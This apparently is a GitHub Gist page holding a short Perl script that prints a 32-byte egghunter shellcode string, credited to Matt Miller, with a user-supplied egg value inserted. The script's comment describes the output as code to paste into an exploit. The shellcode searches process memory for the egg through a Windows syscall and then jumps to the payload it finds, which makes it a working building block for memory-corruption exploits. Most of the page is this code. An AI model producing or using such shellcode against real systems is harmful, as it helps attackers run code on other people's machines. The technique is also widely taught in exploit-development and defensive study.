Skip to content

Instantly share code, notes, and snippets.



Last active Nov 17, 2019
What would you like to do?
Generate 32 bytes egg hunter code, based on Matt Miller's implementation
# Prints egghunter code to be pasted into an exploit.
# Example:
# $ ./ 41424344
use strict;
use warnings;
# This is the egghunter implementation by Matt Miller, $ARGV[0] will be placed instead of the egg
my $egghunter = "\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x%s\\x%s\\x%s\\x%s\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7";
my $egg = $ARGV[0];
my @chars = ($egg =~ m/../g);
print("# Egghunter 32 bytes - Egg: $egg\n\n");
printf($egghunter, @chars);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment